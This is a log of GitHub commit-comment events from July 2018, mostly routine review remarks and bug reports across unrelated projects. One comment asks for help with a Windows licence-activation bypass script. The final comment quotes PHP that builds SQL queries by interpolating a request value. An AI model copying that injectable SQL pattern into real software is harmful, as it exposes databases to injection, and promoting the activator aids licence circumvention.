{"id":"8027998828","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29857118,"position":null,"line":null,"path":null,"commit_id":"d38449d236b4496f43c604df98d69f5e248c79e8","created_at":"2018-07-27T11:09:23Z","updated_at":"2018-07-27T11:09:23Z","author_association":"CONTRIBUTOR","body":"oui, je ne sais pas ce que veut dire BTL ni d'où ça vient mais on peut aussi le garder s'il a une historique"}},"created_at":"2018-07-27T11:09:23Z"}
{"id":"8027999764","type":"CommitCommentEvent","actor":{"login":"ryanshdsdev"},"repo":{"name":"ryanshdsdev/ryanbot"},"payload":{"comment":{"id":29857124,"position":null,"line":null,"path":null,"commit_id":"084bc23fc2ae134074644a498f90ec9cb089fedd","created_at":"2018-07-27T11:09:38Z","updated_at":"2018-07-27T11:09:38Z","author_association":"OWNER","body":"No problem @SleepingDisorder, If you found bug feel free to report it by using .bugreport via my bot.\r\n"}},"created_at":"2018-07-27T11:09:38Z"}
{"id":"8028006129","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29857140,"position":13,"line":35,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"135ac7bd3cfe91b57d2a2e4ed759e2af29b6ea45","created_at":"2018-07-27T11:11:15Z","updated_at":"2018-07-27T11:11:15Z","author_association":"CONTRIBUTOR","body":"I will have to create a few simple guidelines and then do a sweep of the docs. I'm pretty sure that many folks just copy whatever's already there, so it's important to have existing content up to date."}},"created_at":"2018-07-27T11:11:15Z"}
{"id":"8028013866","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29857156,"position":133,"line":133,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T11:13:12Z","updated_at":"2018-07-27T11:13:12Z","author_association":"CONTRIBUTOR","body":"Question: when there are multiple GSoC admins, what is the rule to approve an expense? Unanimity or majority? What if the other org admins are not available (e.g. no response)? How are disputes resolved? Does it make sense to take the disputed amounts to the Jenkins Board? WDYT?"}},"created_at":"2018-07-27T11:13:12Z"}
{"id":"8028016089","type":"CommitCommentEvent","actor":{"login":"developer-guy"},"repo":{"name":"developer-guy/springboot-kotlin-github-api-demo"},"payload":{"comment":{"id":29857163,"position":null,"line":null,"path":null,"commit_id":"2bbe5d78fee463a87925225799403f36941f55db","created_at":"2018-07-27T11:13:44Z","updated_at":"2018-07-27T11:13:44Z","author_association":"OWNER","body":"ss"}},"created_at":"2018-07-27T11:13:44Z"}
{"id":"8028020506","type":"CommitCommentEvent","actor":{"login":"nickkolok"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29857171,"position":null,"line":null,"path":null,"commit_id":"76aeff1dcb22fd914a4c90588746194382fd2930","created_at":"2018-07-27T11:14:53Z","updated_at":"2018-07-27T11:14:53Z","author_association":"NONE","body":"Why the DB is changed?"}},"created_at":"2018-07-27T11:14:53Z"}
{"id":"8028021497","type":"CommitCommentEvent","actor":{"login":"ghazzi0"},"repo":{"name":"EMP83/Cydia-Romania-Traslation"},"payload":{"comment":{"id":29857174,"position":null,"line":null,"path":null,"commit_id":"fa0fc7370094231587202e468f791561b3cefbf7","created_at":"2018-07-27T11:15:09Z","updated_at":"2018-07-27T11:15:09Z","author_association":"NONE","body":"fa0fc73"}},"created_at":"2018-07-27T11:15:09Z"}
{"id":"8028021855","type":"CommitCommentEvent","actor":{"login":"jonataswalker"},"repo":{"name":"jonataswalker/ol-geocoder"},"payload":{"comment":{"id":29857176,"position":null,"line":null,"path":null,"commit_id":"552d87f5ad77292c0c7a302fad5b4820db5f22c2","created_at":"2018-07-27T11:15:14Z","updated_at":"2018-07-27T11:15:14Z","author_association":"OWNER","body":"Not able to have Edge here, but I guess this is good to go. Thank you."}},"created_at":"2018-07-27T11:15:14Z"}
{"id":"8028022793","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29857180,"position":null,"line":null,"path":null,"commit_id":"d38449d236b4496f43c604df98d69f5e248c79e8","created_at":"2018-07-27T11:15:26Z","updated_at":"2018-07-27T11:15:26Z","author_association":"CONTRIBUTOR","body":"C'était un terme qui était là avant. Ça ne me dérange pas de le changer, pourquoi pas ?"}},"created_at":"2018-07-27T11:15:26Z"}
{"id":"8028023025","type":"CommitCommentEvent","actor":{"login":"LisaLandes"},"repo":{"name":"Deutsche-Digitale-Bibliothek/ddblabs-ddbtools-statistic"},"payload":{"comment":{"id":29857181,"position":null,"line":null,"path":null,"commit_id":"2ba39e6257afaa0a3e4662bcc1af09e4591640c4","created_at":"2018-07-27T11:15:30Z","updated_at":"2018-07-27T11:15:30Z","author_association":"NONE","body":"Laut Michael können wir diese \"Änderungen\" beim Namen ignorieren. An den Zahlen hat sich nichts geändert, was auch seine Richtigkeit hat, da in dieser Woche nichts ingestiert wurde."}},"created_at":"2018-07-27T11:15:30Z"}
{"id":"8028025598","type":"CommitCommentEvent","actor":{"login":"atilaneves"},"repo":{"name":"atilaneves/automem"},"payload":{"comment":{"id":29857186,"position":7,"line":52,"path":"source/automem/utils.d","commit_id":"d507a5049652eb198deb4baa5db9d222f96c83ba","created_at":"2018-07-27T11:16:08Z","updated_at":"2018-07-27T11:16:08Z","author_association":"OWNER","body":"Well spotted."}},"created_at":"2018-07-27T11:16:08Z"}
{"id":"8028025892","type":"CommitCommentEvent","actor":{"login":"ghazzi0"},"repo":{"name":"EMP83/Cydia-Romania-Traslation"},"payload":{"comment":{"id":29857187,"position":1,"line":1,"path":"README.md","commit_id":"fa0fc7370094231587202e468f791561b3cefbf7","created_at":"2018-07-27T11:16:11Z","updated_at":"2018-07-27T11:16:11Z","author_association":"NONE","body":"fa0fc73"}},"created_at":"2018-07-27T11:16:11Z"}
{"id":"8028027692","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29857193,"position":153,"line":153,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T11:16:38Z","updated_at":"2018-07-27T11:16:38Z","author_association":"CONTRIBUTOR","body":"ETA -> the timing"}},"created_at":"2018-07-27T11:16:38Z"}
{"id":"8028031635","type":"CommitCommentEvent","actor":{"login":"jeff-phillips-18"},"repo":{"name":"dabeng/patternfly"},"payload":{"comment":{"id":29857212,"position":5,"line":527,"path":"src/js/patternfly-functions-vertical-nav.js","commit_id":"f1ddc35e0d6903a4b3722336075723e3c12793ce","created_at":"2018-07-27T11:17:40Z","updated_at":"2018-07-27T11:17:40Z","author_association":"NONE","body":"This isn't necessary as it is done below after the call to this function."}},"created_at":"2018-07-27T11:17:40Z"}
{"id":"8028032855","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29857215,"position":null,"line":null,"path":null,"commit_id":"21691770ddc54a76376c3176648084fc6621ae5b","created_at":"2018-07-27T11:18:00Z","updated_at":"2018-07-27T11:18:00Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/10/display/redirect) (on internal Jenkins) failed in stage 'Checkout' 🔥 : hudson.AbortException: script returned exit code 1\n\n🔥 [Test run failed]() 🔥\n"}},"created_at":"2018-07-27T11:18:00Z"}
{"id":"8028033702","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857216,"position":24,"line":22,"path":"contracts/Splitter.sol","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T11:18:12Z","updated_at":"2018-07-27T11:18:12Z","author_association":"NONE","body":"So you do `value.div(2)` here once and another time in `isEvenNumber`. Can you try to not waste that gas?"}},"created_at":"2018-07-27T11:18:12Z"}
{"id":"8028034732","type":"CommitCommentEvent","actor":{"login":"ArmeF97"},"repo":{"name":"peter-iakovlev/Telegram"},"payload":{"comment":{"id":29857218,"position":null,"line":null,"path":null,"commit_id":"8b78527678dcd92f4f1b47670d8be8988e25131d","created_at":"2018-07-27T11:18:29Z","updated_at":"2018-07-27T11:18:29Z","author_association":"NONE","body":"Why don't you update this repo every time a new version is out? Isn't Telegram open source?"}},"created_at":"2018-07-27T11:18:29Z"}
{"id":"8028039152","type":"CommitCommentEvent","actor":{"login":"xupefei"},"repo":{"name":"xupefei/Locale-Emulator"},"payload":{"comment":{"id":29857224,"position":null,"line":null,"path":null,"commit_id":"b6eb3fe5de3885aa29763692d287e2e8e74f14ac","created_at":"2018-07-27T11:19:40Z","updated_at":"2018-07-27T11:19:40Z","author_association":"OWNER","body":"There is a Uninstall button in LEInstaller.exe.\nClick on it then reboot.\n\nCheers,\nPaddy\n\n> On 27 Jul 2018, at 04:06, OhnoIvecreatedamess <notifications@github.com> wrote:\n> \n> Can I ask for a guide on how to install it after using it?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/xupefei/Locale-Emulator/commit/b6eb3fe5de3885aa29763692d287e2e8e74f14ac#commitcomment-29852458>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABnBJxcvTyOuvBf2cWvCIoPGPAf1zT7Kks5uKmepgaJpZM4ViwxR>.\n> \n\n"}},"created_at":"2018-07-27T11:19:40Z"}
{"id":"8028039889","type":"CommitCommentEvent","actor":{"login":"jamesthurman64"},"repo":{"name":"jch/html-pipeline"},"payload":{"comment":{"id":29857225,"position":null,"line":null,"path":null,"commit_id":"ea00c7c29867eb175258fec08374cb6de5760852","created_at":"2018-07-27T11:19:53Z","updated_at":"2018-07-27T11:19:53Z","author_association":"NONE","body":"1212951bc61641dd8190022a2b6e9aaef9e6e7c9"}},"created_at":"2018-07-27T11:19:53Z"}
{"id":"8028041999","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857227,"position":26,"line":24,"path":"contracts/Splitter.sol","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T11:20:23Z","updated_at":"2018-07-27T11:20:23Z","author_association":"NONE","body":"You are saying that if there is a remainder, then it is equal to 1. So what you do is calculate the remainder, then if it is `== 0`, you say `isEven == true`, then if `isEven == true`, you say, ok, `remainder == 1`.\r\nWhy not calculate the remainder once and not bother converting back and forth between `bool`?"}},"created_at":"2018-07-27T11:20:23Z"}
{"id":"8028044704","type":"CommitCommentEvent","actor":{"login":"prasadispawar"},"repo":{"name":"prasadispawar/branchStructure"},"payload":{"comment":{"id":29857232,"position":2,"line":2,"path":"mergeFromBranch.txt","commit_id":"bab688c86a9b269ad1a192f4e81b235079c2ed12","created_at":"2018-07-27T11:21:08Z","updated_at":"2018-07-27T11:21:08Z","author_association":"OWNER","body":"this is required"}},"created_at":"2018-07-27T11:21:08Z"}
{"id":"8028045991","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857235,"position":9,"line":14,"path":"contracts/Splitter.sol","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T11:21:28Z","updated_at":"2018-07-27T11:21:28Z","author_association":"NONE","body":"If you say `tokens`, people will imagine \"not Ethers\". However, here, it is Ether, so better use words like \"wei\" or \"value\"."}},"created_at":"2018-07-27T11:21:28Z"}
{"id":"8028051568","type":"CommitCommentEvent","actor":{"login":"Petertitirloloby"},"repo":{"name":"Petertitirloloby/bear"},"payload":{"comment":{"id":29857246,"position":null,"line":null,"path":null,"commit_id":"2eee4618396bd39477539098b8791625be4add3f","created_at":"2018-07-27T11:22:56Z","updated_at":"2018-07-27T11:22:56Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-27T11:22:56Z"}
{"id":"8028052183","type":"CommitCommentEvent","actor":{"login":"Atokulus"},"repo":{"name":"Atokulus/stm32loader"},"payload":{"comment":{"id":29857247,"position":null,"line":null,"path":null,"commit_id":"6cbdebfdd57365e776f1693bbaa15a8c2e0639c7","created_at":"2018-07-27T11:23:07Z","updated_at":"2018-07-27T11:23:07Z","author_association":"OWNER","body":"Allows to import the script as a module.\r\n\r\nIt would be great to put the script as a module on PyPi. Any comments regarding this?"}},"created_at":"2018-07-27T11:23:07Z"}
{"id":"8028052556","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857248,"position":12,"line":12,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T11:23:13Z","updated_at":"2018-07-27T11:23:13Z","author_association":"NONE","body":"What I usually do is:\r\n\r\n```javascript\r\nbeforeEach(\"deploy new instance\", async ()....\r\n```\r\nLike that, if there is an error in it, it will tell you where."}},"created_at":"2018-07-27T11:23:13Z"}
{"id":"8028078980","type":"CommitCommentEvent","actor":{"login":"ilia3101"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29857315,"position":null,"line":null,"path":null,"commit_id":"ce8a1cd31b41d1fc20d58a023a3d7b5c9ba01a92","created_at":"2018-07-27T11:29:56Z","updated_at":"2018-07-27T11:29:56Z","author_association":"OWNER","body":"Yay now the highlight reconstruction will be faster"}},"created_at":"2018-07-27T11:29:56Z"}
{"id":"8028082972","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857327,"position":27,"line":32,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-27T11:30:59Z","updated_at":"2018-07-27T11:30:59Z","author_association":"NONE","body":"That does not sound right. Comment out everything and make an event only with\r\n\r\n`LogValues(msg.value, half, remainder);`"}},"created_at":"2018-07-27T11:30:59Z"}
{"id":"8028084572","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29857332,"position":27,"line":32,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-27T11:31:21Z","updated_at":"2018-07-27T11:31:21Z","author_association":"NONE","body":"Also make a branch with this bad code."}},"created_at":"2018-07-27T11:31:21Z"}
{"id":"8028090501","type":"CommitCommentEvent","actor":{"login":"SergiySW"},"repo":{"name":"SergiySW/raiblocks"},"payload":{"comment":{"id":29857342,"position":null,"line":null,"path":null,"commit_id":"3f3a628dc9348a28684ca8d874efa091f38fda83","created_at":"2018-07-27T11:32:48Z","updated_at":"2018-07-27T11:32:48Z","author_association":"OWNER","body":"https://github.com/nanocurrency/raiblocks/pull/1001"}},"created_at":"2018-07-27T11:32:48Z"}
{"id":"8028091715","type":"CommitCommentEvent","actor":{"login":"SergiySW"},"repo":{"name":"SergiySW/raiblocks"},"payload":{"comment":{"id":29857346,"position":null,"line":null,"path":null,"commit_id":"3a4dd1a0820a3e5fe2c11f093d927728c258b1ff","created_at":"2018-07-27T11:33:06Z","updated_at":"2018-07-27T11:33:06Z","author_association":"OWNER","body":"https://github.com/nanocurrency/raiblocks/pull/937\r\nhttps://github.com/nanocurrency/raiblocks/pull/999"}},"created_at":"2018-07-27T11:33:06Z"}
{"id":"8028100429","type":"CommitCommentEvent","actor":{"login":"zemlyzhang"},"repo":{"name":"openwrt/luci"},"payload":{"comment":{"id":29857356,"position":null,"line":null,"path":null,"commit_id":"6f47c5657f827a6202ad9f1937358893d2722132","created_at":"2018-07-27T11:35:20Z","updated_at":"2018-07-27T11:35:20Z","author_association":"NONE","body":"cd "}},"created_at":"2018-07-27T11:35:20Z"}
{"id":"8028113012","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29857375,"position":null,"line":null,"path":null,"commit_id":"ce8a1cd31b41d1fc20d58a023a3d7b5c9ba01a92","created_at":"2018-07-27T11:38:34Z","updated_at":"2018-07-27T11:38:34Z","author_association":"COLLABORATOR","body":"... if it's unused. Yes 😄  I get 2fps+ on a i7 on Windows."}},"created_at":"2018-07-27T11:38:34Z"}
{"id":"8028115949","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"gammu/gammu"},"payload":{"comment":{"id":29857381,"position":7,"line":207,"path":"include/gammu-error.h","commit_id":"eed44a667701690cabc19416031b463988705ad0","created_at":"2018-07-27T11:39:20Z","updated_at":"2018-07-27T11:39:20Z","author_association":"MEMBER","body":"Please add new errors to the end so that numbers for existing ones do not change."}},"created_at":"2018-07-27T11:39:20Z"}
{"id":"8028117629","type":"CommitCommentEvent","actor":{"login":"bennofs"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29857386,"position":null,"line":null,"path":null,"commit_id":"378392e7cd513c8ab5fe800f224ed717a52eab39","created_at":"2018-07-27T11:39:46Z","updated_at":"2018-07-27T11:39:46Z","author_association":"CONTRIBUTOR","body":"This re-introduces the bug fixed by #10624 again, because `spaceline-height` does font measurement...."}},"created_at":"2018-07-27T11:39:46Z"}
{"id":"8028119160","type":"CommitCommentEvent","actor":{"login":"horenmar"},"repo":{"name":"master-keying/mks"},"payload":{"comment":{"id":29857388,"position":4,"line":159,"path":"src/main/cpp/flatset.h","commit_id":"3b1421e4e96d57d485ec877d1c124c9fe8adf427","created_at":"2018-07-27T11:40:10Z","updated_at":"2018-07-27T11:40:10Z","author_association":"MEMBER","body":"Access (same for the other overload)."}},"created_at":"2018-07-27T11:40:10Z"}
{"id":"8028119327","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"gammu/gammu"},"payload":{"comment":{"id":29857389,"position":8,"line":585,"path":"include/gammu-info.h","commit_id":"eed44a667701690cabc19416031b463988705ad0","created_at":"2018-07-27T11:40:12Z","updated_at":"2018-07-27T11:40:12Z","author_association":"MEMBER","body":"Same here - inserting values changes numbers and breaks ABI what is not necessary."}},"created_at":"2018-07-27T11:40:12Z"}
{"id":"8028120222","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"gammu/gammu"},"payload":{"comment":{"id":29857392,"position":7,"line":39,"path":"include/gammu-memory.h","commit_id":"eed44a667701690cabc19416031b463988705ad0","created_at":"2018-07-27T11:40:24Z","updated_at":"2018-07-27T11:40:24Z","author_association":"MEMBER","body":"...and here."}},"created_at":"2018-07-27T11:40:24Z"}
{"id":"8028120319","type":"CommitCommentEvent","actor":{"login":"MishaDemianenko"},"repo":{"name":"neo4j/cypher-shell"},"payload":{"comment":{"id":29857393,"position":4,"line":3,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"3cdb680e85924baa76c234288b79f14e6255dbf2","created_at":"2018-07-27T11:40:26Z","updated_at":"2018-07-27T11:40:26Z","author_association":"NONE","body":"Is there any reason why we use 4.8.1 and not latest 4.9?"}},"created_at":"2018-07-27T11:40:26Z"}
{"id":"8028121511","type":"CommitCommentEvent","actor":{"login":"bennofs"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29857396,"position":null,"line":null,"path":null,"commit_id":"378392e7cd513c8ab5fe800f224ed717a52eab39","created_at":"2018-07-27T11:40:44Z","updated_at":"2018-07-27T11:40:44Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/3192959/43318812-a154549c-91a2-11e8-9ca2-ef70d8827fd3.png)\r\nis how my spaceline looks with this bug."}},"created_at":"2018-07-27T11:40:44Z"}
{"id":"8028124119","type":"CommitCommentEvent","actor":{"login":"korg1488"},"repo":{"name":"solandmedotru/stepic_Python"},"payload":{"comment":{"id":29857401,"position":null,"line":null,"path":null,"commit_id":"a5f17dac5ff85317db1413f63b0e6b5dcc0964f4","created_at":"2018-07-27T11:41:23Z","updated_at":"2018-07-27T11:41:23Z","author_association":"NONE","body":"Необходимо заменить 5 строку на: \r\n   if a <= h <= b"}},"created_at":"2018-07-27T11:41:23Z"}
{"id":"8028139883","type":"CommitCommentEvent","actor":{"login":"p0deje"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29857449,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-27T11:45:24Z","updated_at":"2018-07-27T11:45:24Z","author_association":"MEMBER","body":"File detector now yields string as I need to split the string by \"\\n\". Do you think I should instead yield that string wrapped in array?"}},"created_at":"2018-07-27T11:45:24Z"}
{"id":"8028140107","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29857451,"position":null,"line":null,"path":null,"commit_id":"b7c5024a5a14b4309a79be817606677cc2c99c1e","created_at":"2018-07-27T11:45:28Z","updated_at":"2018-07-27T11:45:28Z","author_association":"COLLABORATOR","body":"@johnsBeharry @micey969 hey guys, can you all tell me if I did this merge correctly from 'develop' branch? There was one merge conflict in run.py that I resolved by choosing the HEAD version (1c-tipping-monikers) instead of the 'develop' one. I'm assuming the conflict came from the actual areas of code I've been updating inside '1c-tipping-monikers'.\r\n\r\nThanks much!"}},"created_at":"2018-07-27T11:45:28Z"}
{"id":"8028141260","type":"CommitCommentEvent","actor":{"login":"fredsim"},"repo":{"name":"CHEF-KOCH/KMS-activator"},"payload":{"comment":{"id":29857452,"position":null,"line":null,"path":null,"commit_id":"2710d191f8c18ab9666e88f700b369aca876cc3d","created_at":"2018-07-27T11:45:46Z","updated_at":"2018-07-27T11:45:46Z","author_association":"NONE","body":"hello,\r\nyour script in this link:\r\n\r\nhttps://github.com/CHEF-KOCH/KMS-activator/releases/download/0.4/W10_Digital_Licence_Activation_Script_2.3.7z\r\n\r\ndoesn't work well when i put $OEM$ insude the \"sources\" folder in the windows installer following instruction.\r\nOn the first but i got \"just a moment...\" stuck forever till i push reset my pc then it can continue again.\r\nAnd finally got itself activated digitally.\r\n\r\nDo you what's the problem? Why it always stucks on \"just a moment...\" on the first boot and have to reset my pc again so that i can continue?\r\n\r\nThanks\r\n"}},"created_at":"2018-07-27T11:45:46Z"}
{"id":"8028141295","type":"CommitCommentEvent","actor":{"login":"nriley"},"repo":{"name":"gilbertchen/duplicacy"},"payload":{"comment":{"id":29857453,"position":null,"line":null,"path":null,"commit_id":"fce42348617039134300101a54af4990aa7d6c3c","created_at":"2018-07-27T11:45:46Z","updated_at":"2018-07-27T11:45:46Z","author_association":"NONE","body":"It's a problem with a 32-bit ABI.  My guess is that it triggered an unaligned access due to the way the structure was packed. See #469 for the problem that this fixed for me."}},"created_at":"2018-07-27T11:45:46Z"}
{"id":"8028143895","type":"CommitCommentEvent","actor":{"login":"spkprav"},"repo":{"name":"spkprav/ofn"},"payload":{"comment":{"id":29857458,"position":null,"line":null,"path":null,"commit_id":"539da319a276e5cfe21b7519828bd0189fe06da8","created_at":"2018-07-27T11:46:24Z","updated_at":"2018-07-27T11:46:24Z","author_association":"OWNER","body":"u = Spree::User.find_by_email('farmer001@yopmail.com')\r\nEnterpriseRole.where(user_id: 181)\r\nu.enterprise_roles\r\nu.enterprise_roles.map { |er| er.enterprise }\r\nEnterpriseRole.where(user_id: 181)[0].enterprise.is_primary_producer?"}},"created_at":"2018-07-27T11:46:24Z"}
{"id":"8028149338","type":"CommitCommentEvent","actor":{"login":"PrincessDury"},"repo":{"name":"amitshekhariitbhu/Android-TensorFlow-Lite-Example"},"payload":{"comment":{"id":29857467,"position":15,"line":15,"path":"app/src/main/res/drawable-v24/ic_launcher_foreground.xml","commit_id":"1ff53dbb63fccfb65ea417c5a61d052bafbae7c4","created_at":"2018-07-27T11:47:50Z","updated_at":"2018-07-27T11:47:50Z","author_association":"NONE","body":"99809"}},"created_at":"2018-07-27T11:47:50Z"}
{"id":"8028149536","type":"CommitCommentEvent","actor":{"login":"pizzagara"},"repo":{"name":"pizzagara/hello-world"},"payload":{"comment":{"id":29857469,"position":null,"line":null,"path":null,"commit_id":"b57d5e490e31fa71905da33f975ad1d4493d9044","created_at":"2018-07-27T11:47:53Z","updated_at":"2018-07-27T11:47:53Z","author_association":"OWNER","body":"This is the initial test repository for learning about GitHub"}},"created_at":"2018-07-27T11:47:53Z"}
{"id":"8028153132","type":"CommitCommentEvent","actor":{"login":"ace1122sp"},"repo":{"name":"ace1122sp/example"},"payload":{"comment":{"id":29857476,"position":null,"line":null,"path":null,"commit_id":"f34abc331047fc94f0e6658fbaafbae150381105","created_at":"2018-07-27T11:48:49Z","updated_at":"2018-07-27T11:48:49Z","author_association":"OWNER","body":"what's this"}},"created_at":"2018-07-27T11:48:49Z"}
{"id":"8028155348","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":29857483,"position":null,"line":null,"path":null,"commit_id":"68951b7c3d415b62f059e3cf02f61398305a5d99","created_at":"2018-07-27T11:49:24Z","updated_at":"2018-07-27T11:49:24Z","author_association":"MEMBER","body":"@miguelsousa true, but in that case the code doesn't unconditionally assert, but uses `.get(..., 0)` falling back to a null nameID in case one can't be found. So I didn't touch those."}},"created_at":"2018-07-27T11:49:24Z"}
{"id":"8028157535","type":"CommitCommentEvent","actor":{"login":"Osirisoo0O"},"repo":{"name":"Osirisoo0O/Osirisoo0O.github.io"},"payload":{"comment":{"id":29857488,"position":2,"line":4,"path":"_posts/2014-3-3-Hello-World.md","commit_id":"e29df684bd31f193092409c9af5ce71091e2094f","created_at":"2018-07-27T11:50:00Z","updated_at":"2018-07-27T11:50:00Z","author_association":"OWNER","body":"This is a test for my blog."}},"created_at":"2018-07-27T11:50:00Z"}
{"id":"8028158886","type":"CommitCommentEvent","actor":{"login":"ap3h3ad"},"repo":{"name":"OpenIdentityPlatform/OpenDJ"},"payload":{"comment":{"id":29857491,"position":null,"line":null,"path":null,"commit_id":"48b20fb5541d6469137f090dc86f950866f56e62","created_at":"2018-07-27T11:50:20Z","updated_at":"2018-07-27T11:50:20Z","author_association":"NONE","body":"Hi,\r\n\r\ndid this fix actually help? We're struggeling with the problem that a log file has a size which is a multiple of 265 and this code change didn't help. Are there any other files that have to be edited besides this two? I've read that in OpenDJ 4 this problem no longer exists but we're using OpenDJ 3.0."}},"created_at":"2018-07-27T11:50:20Z"}
{"id":"8028160097","type":"CommitCommentEvent","actor":{"login":"ap3h3ad"},"repo":{"name":"OpenIdentityPlatform/OpenDJ"},"payload":{"comment":{"id":29857493,"position":null,"line":null,"path":null,"commit_id":"d8a0693ee610f39d28ccaf139869578b08c307ec","created_at":"2018-07-27T11:50:37Z","updated_at":"2018-07-27T11:50:37Z","author_association":"NONE","body":"Hi,\r\n\r\ndid this fix actually help? We're struggeling with the problem that a log file has a size which is a multiple of 265 and this code change didn't help. Are there any other files that have to be edited besides this two? I've read that in OpenDJ 4 this problem no longer exists but we're using OpenDJ 3.0."}},"created_at":"2018-07-27T11:50:37Z"}
{"id":"8028164098","type":"CommitCommentEvent","actor":{"login":"cdebonneuil"},"repo":{"name":"cdebonneuil/hello"},"payload":{"comment":{"id":29857500,"position":null,"line":null,"path":null,"commit_id":"7e1f8e35b4ce5ad8b75ae1291e7b0904d1a9cb33","created_at":"2018-07-27T11:51:39Z","updated_at":"2018-07-27T11:51:39Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T11:51:39Z"}
{"id":"8028166425","type":"CommitCommentEvent","actor":{"login":"verbuggt"},"repo":{"name":"verbuggt/AwesomeStats-API"},"payload":{"comment":{"id":29857505,"position":null,"line":null,"path":null,"commit_id":"ea3e986dc7975160dfde9f52e74cba35a5448771","created_at":"2018-07-27T11:52:12Z","updated_at":"2018-07-27T11:52:12Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-27T11:52:12Z"}
{"id":"8028166464","type":"CommitCommentEvent","actor":{"login":"penya2nk"},"repo":{"name":"mrizkir/portalekampus"},"payload":{"comment":{"id":29857506,"position":null,"line":null,"path":null,"commit_id":"02a9202dab78d258b291058a1651e687703de79a","created_at":"2018-07-27T11:52:13Z","updated_at":"2018-07-27T11:52:13Z","author_association":"CONTRIBUTOR","body":"CformulirPendaftaran bermasalah selalu menghilangkan darabase secara tiba2 \r\npublic function deleteRecord($sender,$param) {\r\n\t\t$no_formulir=$this->getDataKeyField($sender,$this->RepeaterS);\r\n        try {\r\n            if ($this->DB->checkRecordIsExist('no_formulir','register_mahasiswa',$no_formulir)) {\r\n                throw new Exception (\"Tidak menghapus mahasiswa ini karena telah memiliki NIM.\");\r\n            }\r\n            $str = \"formulir_pendaftaran WHERE no_formulir='$no_formulir'\";\r\n            $this->DB->query('BEGIN');\r\n            if ($this->DB->deleteRecord($str) ) {\r\n                $this->DB->deleteRecord (\"transaksi WHERE no_formulir='$no_formulir'\");\r\n                $this->DB->query ('COMMIT');\r\n                $this->redirect('spmb.FormulirPendaftaran',true);\r\n            }else {\r\n                $this->DB->query ('ROLLBACK');\r\nmungkin ini masalahnya. mohon diperbaiki master...."}},"created_at":"2018-07-27T11:52:13Z"}
